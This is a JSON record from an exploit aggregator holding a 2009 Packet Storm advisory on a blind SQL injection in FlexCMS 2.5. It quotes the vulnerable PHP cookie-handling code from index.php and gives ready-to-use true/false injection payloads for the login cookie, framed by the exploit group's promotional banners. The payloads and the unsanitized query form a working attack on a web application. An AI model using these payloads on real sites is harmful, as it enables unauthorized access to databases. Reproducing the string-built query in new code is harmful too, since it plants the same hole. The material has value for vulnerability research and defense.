{"id": "PACKETSTORM:80762", "type": "packetstorm", "bulletinFamily": "exploit", "title": "FlexCMS 2.5 Blind SQL Injection", "description": "", "published": "2009-08-28T00:00:00", "modified": "2009-08-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/80762/FlexCMS-2.5-Blind-SQL-Injection.html", "reporter": "Inj3ct0r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:23:46", "viewCount": 10, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/80762/flexcms25-sql.txt", "sourceData": "`============================================= \nFlexCMS <= 2.5 (index.php)Blind SQL-Injection \n============================================= \n \n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 0 \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 \n \n#[+] Discovered By : Inj3ct0r \n#[+] Site : Inj3ct0r.com \n#[+] Support e-mail : submit[at]inj3ct0r.com \n#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net \n \n \nSite product: www.flexcms.com \nVersion: 2.5 \nRequirements: magic_quotes_gpc = off \n \nVulnerability file (index.php) : \n \n \n$CookieData = $HTTP_COOKIE_VARS[$CookieName]; \n \n$LoggedIn = 'n'; \n$UserLevel = 0; \n \nif ($CookieData != '' && $CookieData != 'not_logged_in') { \nlist ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2); \nif ($CookieUsername != '' && $CookiePassword != '') { \n$query = \"select RecordNumber,Level,Password,DisplayName,SessionLen gth from `\".$Settings['DBPrefix'].\"core-Users` where Username='$CookieUsername' LIMIT 1\"; \n$result = mysql_query($query) or die (mysql_error()); \n \n \nIn the cookies sent login and pass, in such a \nlogin == hash_pass \nBecause the variable $ CookieUsername not filtered and if magic_quotes_gpc = off is the opportunity to inj3ct0r \n \n \nExample: \n \n \nTrue: FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI \nFalse: FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI \n \n \n--------------------------------- \n \nThE End =] Visit my proj3ct : \n \nhttp://inj3ct0r.com \nhttp://inj3ct0r.org \nhttp://inj3ct0r.net \n \n \n# ~ - [ [ : Inj3ct0r : ] ]`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645400835, "score": 1659770509}}
{}